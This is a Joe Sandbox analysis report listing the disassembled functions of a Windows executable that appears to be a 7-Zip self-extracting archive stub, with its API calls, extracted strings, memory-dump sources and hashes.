Opcode ID: 5f2616ad24b74ab3b3c53048b37fa2c0e98c535542d0e7834049dc9cf8634cb0
Instruction ID: 4b0d62aee0caa64fe906b0c8bb83bc11348460c21612f4a75cf9423b72749376
Opcode Fuzzy Hash: 5f2616ad24b74ab3b3c53048b37fa2c0e98c535542d0e7834049dc9cf8634cb0
Instruction Fuzzy Hash: 27F14971600209DFCB24DF65C884AAA77E5BF48314F24417AFC15AB7A2DB39EC4ACB54

Function 00401B75 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateDirectoryW.KERNELBASE(k7@,00000000,-00000001,0040376B,?,004017CF,?,?,?,?,004017CF,?), ref: 00401B7C
GetLastError.KERNEL32(?,?,?,?,004017CF,?), ref: 00401B86
SetLastError.KERNEL32(000000B7,?,?,?,?,004017CF,?), ref: 00401B96
GetFileAttributesW.KERNELBASE(?,?,?,?,?,004017CF,?), ref: 00401BA4

Strings

k7@, xrefs: 00401B78

Memory Dump Source

Source File: 00000000.00000002.3192997034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3192972611.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193036793.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193069018.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193104545.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd

Similarity

API ID: ErrorLast$AttributesCreateDirectoryFile
String ID: k7@
API String ID: 635176117-1561861239
Opcode ID: 7fa23999d3db3281292cd00d2626ae9ff6d2ad14d17e5580772b07dc82ab3e50
Instruction ID: 71014ff69d247b10dec1bc4f18777740662f48cc5fd99e7c756ec1d8f22ae331
Opcode Fuzzy Hash: 7fa23999d3db3281292cd00d2626ae9ff6d2ad14d17e5580772b07dc82ab3e50
Instruction Fuzzy Hash: 72E04831918510EFDB125B34FC48BDF7B659F85365F908672F459E01F4E3749C428549

Function 0040E9EF Relevance: 8.0, APIs: 3, Strings: 2, Instructions: 462
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

??2@YAPAXI@Z.MSVCRT(00000018,00000000,?,00000000,?), ref: 0040EA5A
??2@YAPAXI@Z.MSVCRT(00000028,00000000,00000000,?,00000000,?), ref: 0040EAA4

Strings

{D@, xrefs: 0040ED6C, 0040EED8
DmA, xrefs: 0040EA31

Memory Dump Source

Source File: 00000000.00000002.3192997034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3192972611.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193036793.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193069018.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193104545.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd

Similarity

API ID: ??2@
String ID: DmA${D@
API String ID: 1033339047-1777112864
Opcode ID: 0fbc1e047aa24a6cf396f6002696145173c8f9cc79442394acc3b55e615792f3
Instruction ID: 6b6f199f6b2a7d9dc60afa7eeb36d7837fa60508d4a378e5edde095099593778
Opcode Fuzzy Hash: 0fbc1e047aa24a6cf396f6002696145173c8f9cc79442394acc3b55e615792f3
Instruction Fuzzy Hash: 0E120371900249DFCB24DF66C88099ABBB5FF08304B14496EF91AA7391DB39E995CF84

Function 00410CCB Relevance: 7.6, APIs: 5, Instructions: 141
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memcpy.MSVCRT(00000000,?,00000020,00010000), ref: 00410D22
memmove.MSVCRT(00000000,?,00000020,?,00010000), ref: 00410DB9
??3@YAXPAX@Z.MSVCRT(00000000), ref: 00410DC5

Memory Dump Source

Source File: 00000000.00000002.3192997034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3192972611.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193036793.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193069018.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193104545.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd

Similarity

API ID: ??3@memcpymemmove
String ID:
API String ID: 3549172513-0
Opcode ID: bb969950ca7e8fc586f1592cde3b65447558a250e482fe49850de850b0ee1319
Instruction ID: 2e51937533cdabe9fe59c05819b629b516a53c036badf135e90f0136c29b37f2
Opcode Fuzzy Hash: bb969950ca7e8fc586f1592cde3b65447558a250e482fe49850de850b0ee1319
Instruction Fuzzy Hash: F141C171A00204ABDB24EAA5D940BFEB7B5FF84704F14446EE846A7341D7B8BEC18B59

Function 00404903 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 92
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

#17.COMCTL32(00000000,00000020,-00000002), ref: 0040490F

Part of subcall function 00402131: GetUserDefaultUILanguage.KERNEL32(0040491F), ref: 0040213B

Part of subcall function 00402187: GetLastError.KERNEL32(00000000,00000020,-00000002), ref: 004021D6
Part of subcall function 00402187: wsprintfW.USER32 ref: 004021E7
Part of subcall function 00402187: GetEnvironmentVariableW.KERNEL32(?,00000000,00000000), ref: 004021FC
Part of subcall function 00402187: GetLastError.KERNEL32 ref: 00402201
Part of subcall function 00402187: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040221C
Part of subcall function 00402187: GetEnvironmentVariableW.KERNEL32(?,00000000,00000004), ref: 0040222F
Part of subcall function 00402187: GetLastError.KERNEL32 ref: 00402236
Part of subcall function 00402187: lstrcmpiW.KERNEL32(00AA9848,00404926), ref: 0040224B
Part of subcall function 00402187: ??3@YAXPAX@Z.MSVCRT(00AA9848), ref: 0040225B
Part of subcall function 00402187: SetLastError.KERNEL32(?), ref: 00402282
Part of subcall function 00402187: lstrlenA.KERNEL32(00416208), ref: 004022B6
Part of subcall function 00402187: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 004022D1
Part of subcall function 00402187: GetLocaleInfoW.KERNEL32(?,00001004,?,0000001F), ref: 00402303

Part of subcall function 00402187: ??3@YAXPAX@Z.MSVCRT(00404926), ref: 00402279
Part of subcall function 00402187: _wtol.MSVCRT ref: 00402314
Part of subcall function 00402187: MultiByteToWideChar.KERNEL32(00000000,00416208,00000001,00AA9848,00000002), ref: 00402334

SHGetSpecialFolderPathW.SHELL32(00000000,?,00000000,00000000), ref: 00404995
wsprintfW.USER32 ref: 004049B0

Part of subcall function 004032D9: ??2@YAPAXI@Z.MSVCRT(00000018,00000000,004049F2,?,?,?), ref: 004032DE

Strings

7zSfxFolder%02d, xrefs: 004049AA

Memory Dump Source

Source File: 00000000.00000002.3192997034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3192972611.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193036793.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193069018.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193104545.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd

Similarity

API ID: ErrorLast$??2@$??3@EnvironmentVariablewsprintf$ByteCharDefaultFolderInfoLanguageLocaleMultiPathSpecialUserWide_wtollstrcmpilstrlen
String ID: 7zSfxFolder%02d
API String ID: 3387708999-2820892521
Opcode ID: 0b64465946cb2e48a0dbd03d6f906f8cc659a125e1421e758d292e165e0ccb9d
Instruction ID: 5234f5b279cb727febf32c6091b250cce28905a448a9d0e240f4fe7ebf0ff8ab
Opcode Fuzzy Hash: 0b64465946cb2e48a0dbd03d6f906f8cc659a125e1421e758d292e165e0ccb9d
Instruction Fuzzy Hash: 2731B471A10205ABCB10FFA1DC9AAEEB768AF40304F00417FFA15B60E1EB784946CB58

Function 00402BEE Relevance: 6.4, APIs: 5, Instructions: 118
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenA.KERNEL32(?,?,00403D0E,00419858,?,?,00405C1F,00000000,00000000,?,?,?,00000000,-00000002), ref: 00402C20
lstrlenA.KERNEL32(?,?,00403D0E,00419858,?,?,00405C1F,00000000,00000000,?,?,?,00000000,-00000002), ref: 00402C28
memcmp.MSVCRT(00000000,?,?), ref: 00402C8E
memcmp.MSVCRT(00000000,?,?,?,00403D0E,00419858,?,?,00405C1F,00000000,00000000,?,?,?,00000000,-00000002), ref: 00402CCB
memmove.MSVCRT(?,?,00000000,?,00403D0E,00419858,?,?,00405C1F,00000000,00000000,?,?,?,00000000,-00000002), ref: 00402CFD

Memory Dump Source

Source File: 00000000.00000002.3192997034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3192972611.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193036793.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193069018.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193104545.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd

Similarity

API ID: lstrlenmemcmp$memmove
String ID:
API String ID: 3251180759-0
Opcode ID: fa32a0385ddd39642fa32be0e776516a86df04650160174833642614f5e9d137
Instruction ID: de6905f5b60a3a827beaa0a9a9e283af0395689e13c8cf078280906fc371a6c9
Opcode Fuzzy Hash: fa32a0385ddd39642fa32be0e776516a86df04650160174833642614f5e9d137
Instruction Fuzzy Hash: A7414972D0424DAFDB11DFA4C9889EEBBB9EF48384F14406AE845B3290D3B49E85CB55

Function 00402DD6 Relevance: 6.1, APIs: 4, Instructions: 101
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

??3@YAXPAX@Z.MSVCRT(00405802,00405802,00000000,00000020,?,?,?,?,?,?,?,?,?,00405802,00000000,00000000), ref: 00402EDC

Part of subcall function 00402AD8: MultiByteToWideChar.KERNEL32(00000020,00000000,00000024,?,00000000,?,?,00000020,00000024,00000000,00402E3A,?,?,00000000,00000000,00000000), ref: 00402B0A

??3@YAXPAX@Z.MSVCRT(?,00000000,00000000,00000000,00000020,?,?,?,?,?,?,?,?,?,00405802,00000000), ref: 00402E49
??3@YAXPAX@Z.MSVCRT(?,?,00000000,00000000,00000000,00000020,?,?,?,?,?,?,?,?,?,00405802), ref: 00402E64
??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,00000000,00000000,00000020,?,?,?,?,?,?,?,?,?), ref: 00402E6C

Memory Dump Source

Source File: 00000000.00000002.3192997034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3192972611.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193036793.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193069018.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193104545.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd

Similarity

API ID: ??3@$ByteCharMultiWide
String ID:
API String ID: 1731127917-0
Opcode ID: f66a7f98c2fd82f3632a7c41bf5da107477e30d253b96dd7c1c620e0e730c424
Instruction ID: e682ebc0571d90e9fd1001dd074fc16d37aecbe567f5019eda1f00a411694e7c
Opcode Fuzzy Hash: f66a7f98c2fd82f3632a7c41bf5da107477e30d253b96dd7c1c620e0e730c424
Instruction Fuzzy Hash: BE31F672C44114AADB14FBA2DD429EF73BDEF10318B50443FF856B21E1EE3C9A4586A8

Function 00401611 Relevance: 6.1, APIs: 4, Instructions: 100
synchronizationthreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateThread.KERNELBASE(00000000,00000000,004012E3,00000000,00000000,?), ref: 00401655
WaitForSingleObject.KERNEL32(000000FF,?,004017F5,?,?), ref: 00401676

Part of subcall function 00408DBF: wvsprintfW.USER32(?,00000000,?), ref: 00408DE3
Part of subcall function 00408DBF: GetLastError.KERNEL32 ref: 00408DF4
Part of subcall function 00408DBF: FormatMessageW.KERNEL32(00001100,00000000,00000000,?,?,00000000,00406B79), ref: 00408E1C
Part of subcall function 00408DBF: FormatMessageW.KERNEL32(00001100,00000000,?,00000000,?,00000000,00406B79), ref: 00408E31
Part of subcall function 00408DBF: lstrlenW.KERNEL32(?), ref: 00408E44
Part of subcall function 00408DBF: lstrlenW.KERNEL32(?), ref: 00408E4B
Part of subcall function 00408DBF: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 00408E60
Part of subcall function 00408DBF: lstrcpyW.KERNEL32(00000000,?), ref: 00408E76
Part of subcall function 00408DBF: lstrcpyW.KERNEL32(-00000002,?), ref: 00408E87
Part of subcall function 00408DBF: ??3@YAXPAX@Z.MSVCRT(00000000,00000000), ref: 00408E90
Part of subcall function 00408DBF: LocalFree.KERNEL32(?), ref: 00408E9A

Memory Dump Source

Source File: 00000000.00000002.3192997034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3192972611.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193036793.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193069018.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193104545.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd

Similarity

API ID: FormatMessagelstrcpylstrlen$??2@??3@CreateErrorFreeLastLocalObjectSingleThreadWaitwvsprintf
String ID:
API String ID: 359084233-0
Opcode ID: 66257497e4407e65e3ec51839b2cc1af24185b4b9cde7a4118d25a0965ef4d55
Instruction ID: 99d6c8c0394ba6fc9b9d299436d7c7a44fadaa3de81f278bf7a0439fefe7fe09
Opcode Fuzzy Hash: 66257497e4407e65e3ec51839b2cc1af24185b4b9cde7a4118d25a0965ef4d55
Instruction Fuzzy Hash: 0D31E131600200FBCA355B54DC95EEB36A8EB81754B28853BF515F62F0DA7A8C829A1E

Function 00404545 Relevance: 6.1, APIs: 4, Instructions: 66COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000001,00000000,00000002,00000000,00406D05,00000000,?,?,00405368,?,7ZSfx%03x.cmd), ref: 00404568
GetTempPathW.KERNEL32(00000001,00000000,00000001,?,?,00405368,?,7ZSfx%03x.cmd), ref: 00404585
wsprintfW.USER32 ref: 004045BB
GetFileAttributesW.KERNELBASE(?), ref: 004045D6

Memory Dump Source

Source File: 00000000.00000002.3192997034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3192972611.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193036793.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193069018.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193104545.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd

Similarity

API ID: PathTemp$AttributesFilewsprintf
String ID:
API String ID: 1746483863-0
Opcode ID: 0e4a8cbd59d5c8a173ea11c71d2339e4dceea1800af4b6b4e6d7220fd0c99624
Instruction ID: 733027a3fcd96ec5c8df4ae3473da8ef02d46a04784f0fe1f39aec502691af17
Opcode Fuzzy Hash: 0e4a8cbd59d5c8a173ea11c71d2339e4dceea1800af4b6b4e6d7220fd0c99624
Instruction Fuzzy Hash: C1112772500604FFC701AF55CC84AADB7B8FF84314F10802EF946972E1CB799900CB94

Function 00412525 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 200COMMON

Download Yara Rule

APIs

Part of subcall function 004105E9: _CxxThrowException.MSVCRT(?,00417298), ref: 00410603

??3@YAXPAX@Z.MSVCRT(?,?,?,?,(nA,?,00416DD8), ref: 00412643
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,(nA,?,00416DD8), ref: 0041279B

Strings

(nA, xrefs: 004126DD, 004126E0

Memory Dump Source

Source File: 00000000.00000002.3192997034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3192972611.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193036793.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193069018.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193104545.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd

Similarity

API ID: ??3@$ExceptionThrow
String ID: (nA
API String ID: 2803161813-867891557
Opcode ID: a23f4a3e4590838c40bb2731bcc9978bea7517a1840853a56b40fbfce1223ec6
Instruction ID: 0ece9700425cb4d864afba528f8150fdb1f56e7dd499115c8cef0e07f043e1c2
Opcode Fuzzy Hash: a23f4a3e4590838c40bb2731bcc9978bea7517a1840853a56b40fbfce1223ec6
Instruction Fuzzy Hash: A9814B70A00605AFCB24DFA5C591AEEFBF6BF08314F14452EE515E3391D7B8AA90CB58

Function 0040CBAC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(?), ref: 0040CBC4
_CxxThrowException.MSVCRT(?,00416FBC), ref: 0040CBE7

Strings

PlA, xrefs: 0040CBD6

Memory Dump Source

Source File: 00000000.00000002.3192997034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3192972611.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193036793.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193069018.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193104545.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd

Similarity

API ID: AllocExceptionStringThrow
String ID: PlA
API String ID: 3773818493-1533977103
Opcode ID: 9da6470fb493ce6a5e6bdcff394512404a5483abbe6bbc59635324e60b80df40
Instruction ID: 296fbbf4859103af06767512d87f49f38bd905f8065bfdcdd98956010b0ea552
Opcode Fuzzy Hash: 9da6470fb493ce6a5e6bdcff394512404a5483abbe6bbc59635324e60b80df40
Instruction Fuzzy Hash: 54E0ED71600304EADB209F65E8829D6BBF8EF04785710C53FF948DA250E7B9E980C79C

Function 00403C93 Relevance: 4.7, APIs: 3, Instructions: 151COMMON

Download Yara Rule

APIs

Part of subcall function 0040236F: LoadLibraryA.KERNEL32(kernel32,GetNativeSystemInfo,?,?,?,?,?,004023A5,00405BA0,00419858,00419858), ref: 0040237F
Part of subcall function 0040236F: GetProcAddress.KERNEL32(00000000), ref: 00402386
Part of subcall function 0040236F: GetNativeSystemInfo.KERNELBASE(?,?,?,?,?,?,004023A5,00405BA0,00419858,00419858), ref: 00402394

??3@YAXPAX@Z.MSVCRT(00405C1F,?,?,?,?,?,?,?,00405C1F), ref: 00403E21
??3@YAXPAX@Z.MSVCRT(?,00405C1F,?,?,?,?,?,?,?,00405C1F), ref: 00403E29
??3@YAXPAX@Z.MSVCRT(?,?,00405C1F,?,?,?,?,?,?,?,00405C1F), ref: 00403E31

Memory Dump Source

Source File: 00000000.00000002.3192997034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3192972611.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193036793.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193069018.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193104545.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd

Similarity

API ID: ??3@$AddressInfoLibraryLoadNativeProcSystem
String ID:
API String ID: 1642057587-0
Opcode ID: 572bd86ded921972edbcb4b9d1f3e65da77713091b6bf68aa68be916d146458f
Instruction ID: 921b34b2ca4cae370864143a871e5ac41304b7093d26a65462705394026d5d48
Opcode Fuzzy Hash: 572bd86ded921972edbcb4b9d1f3e65da77713091b6bf68aa68be916d146458f
Instruction Fuzzy Hash: A8515FB2D04109AADF01EFD1CD919FEBB7DAF04309F04406AF511B62C1D7799A4ADB98

Function 0040172C Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 103COMMON

Download Yara Rule

APIs

??2@YAPAXI@Z.MSVCRT(000001E8,00000000,00419810,ExecuteFile,0000002B,0000002B,?,00406616,?,00419810,00419810), ref: 00401739
??2@YAPAXI@Z.MSVCRT(00000040), ref: 004017D6

Part of subcall function 004036F1: lstrlenW.KERNEL32(004017CF,00000000,?,?,?,?,?,?,004017CF,?), ref: 004036FE
Part of subcall function 004036F1: GetSystemTimeAsFileTime.KERNEL32(?,004017CF,?,?,?,?,004017CF,?), ref: 00403774
Part of subcall function 004036F1: GetFileAttributesW.KERNELBASE(?,?,?,?,?,004017CF,?), ref: 0040377B
Part of subcall function 004036F1: ??3@YAXPAX@Z.MSVCRT(?,004017CF,?,?,?,?,004017CF,?), ref: 0040383A

Strings

ExecuteFile, xrefs: 00401731

Memory Dump Source

Source File: 00000000.00000002.3192997034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3192972611.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193036793.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193069018.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193104545.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd

Similarity

API ID: ??2@FileTime$??3@AttributesSystemlstrlen
String ID: ExecuteFile
API String ID: 1306139538-323923146
Opcode ID: 03c1fc4a848cb1bd6dc51e2723fab2d4ca0176e216816c9125f0e1fc3d427f7b
Instruction ID: 9484230cc67166f2f755b6e2650531b124a09860f62e081dc195098c01fa7d0a
Opcode Fuzzy Hash: 03c1fc4a848cb1bd6dc51e2723fab2d4ca0176e216816c9125f0e1fc3d427f7b
Instruction Fuzzy Hash: 6531E375700204BBCB20ABA5CC89CAFB7B9EFC4705728086FF405E73A1DB799D408628

Function 0040E036 Relevance: 4.5, APIs: 3, Instructions: 35COMMON

Download Yara Rule

APIs

??2@YAPAXI@Z.MSVCRT(?,?,?,?,00410D1B,00010000), ref: 0040E049
memmove.MSVCRT(00000000,?,?,?,?,?,00410D1B,00010000), ref: 0040E063
??3@YAXPAX@Z.MSVCRT(?,?,?,?,00410D1B,00010000), ref: 0040E073

Memory Dump Source

Source File: 00000000.00000002.3192997034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3192972611.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193036793.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193069018.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193104545.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd

Similarity

API ID: ??2@??3@memmove
String ID:
API String ID: 3828600508-0
Opcode ID: 8acf0261108fbb4839799140d60bf7db81ea8674b749c97fed008b47ea7385ff
Instruction ID: 4d808faca08bf89b0fd6c24434e0160128b2010f8b4ad61872e4f6e811daac21
Opcode Fuzzy Hash: 8acf0261108fbb4839799140d60bf7db81ea8674b749c97fed008b47ea7385ff
Instruction Fuzzy Hash: 28F08232600720AFD2305F27DD8095BB7A9EBC47153148D3FE5AD92350CAB5E8518659

Function 004026CF Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 39COMMON

Download Yara Rule

APIs

GlobalMemoryStatusEx.KERNELBASE(00000040), ref: 004026F3

Strings

@, xrefs: 004026E6

Memory Dump Source

Source File: 00000000.00000002.3192997034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3192972611.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193036793.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193069018.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193104545.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd

Similarity

API ID: GlobalMemoryStatus
String ID: @
API String ID: 1890195054-2766056989
Opcode ID: 2755d2f4d32b7a33f337b75ab828a694b6e8efe9be06c7f4c0d7d4513a976335
Instruction ID: 06539b43d6f5c2ce11291560a72fbbc8528a2f3b0367cc898c628306ed72bb09
Opcode Fuzzy Hash: 2755d2f4d32b7a33f337b75ab828a694b6e8efe9be06c7f4c0d7d4513a976335
Instruction Fuzzy Hash: 20F0C2309102089ACF19AF70DA9DBAF3BA4BF00348F104A3AD462F72D0D7F8D845864C

Function 0040C7E0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 28COMMON

Download Yara Rule

APIs

??3@YAXPAX@Z.MSVCRT ref: 0040C828

Strings

lA, xrefs: 0040C7F2

Memory Dump Source

Source File: 00000000.00000002.3192997034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3192972611.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193036793.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193069018.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193104545.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd

Similarity

API ID: ??3@
String ID: lA
API String ID: 613200358-262130271
Opcode ID: 057769e26a3b216baade4979d912b87705f9fac977230d9a31cf155ba5458ca5
Instruction ID: be810f4beaf6972e7a5014057c92b7027d0de42a9649241163ddb4af855fb9b0
Opcode Fuzzy Hash: 057769e26a3b216baade4979d912b87705f9fac977230d9a31cf155ba5458ca5
Instruction Fuzzy Hash: 73F01CB26007119BC320EF58D845B87B7E8AF44304B148A3FE48997651E7B8E985CBED

Function 0041017A Relevance: 3.1, APIs: 2, Instructions: 135COMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 0041017F
??3@YAXPAX@Z.MSVCRT(?), ref: 00410274

Memory Dump Source

Source File: 00000000.00000002.3192997034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3192972611.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193036793.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193069018.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193104545.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd

Similarity

API ID: ??3@H_prolog
String ID:
API String ID: 1329742358-0
Opcode ID: 6223a863a7d7b008d518b8a121c65c26c745086cc40489949b2f9b2ead4f2d5c
Instruction ID: 10f57f22a906aa0b0a42583f003833c21146b94334aab583da89fc310c08d6c6
Opcode Fuzzy Hash: 6223a863a7d7b008d518b8a121c65c26c745086cc40489949b2f9b2ead4f2d5c
Instruction Fuzzy Hash: A5410232804014ABCB15DBA4C989AFE7B34EF06304B1440ABF401776A2DABD5EC9975D

Function 00401172 Relevance: 3.0, APIs: 2, Instructions: 42COMMON

Download Yara Rule

APIs

??2@YAPAXI@Z.MSVCRT(00000000,00000000,?,00000000,0040146C,00000003,?,004057B0,?,00000000), ref: 00401192
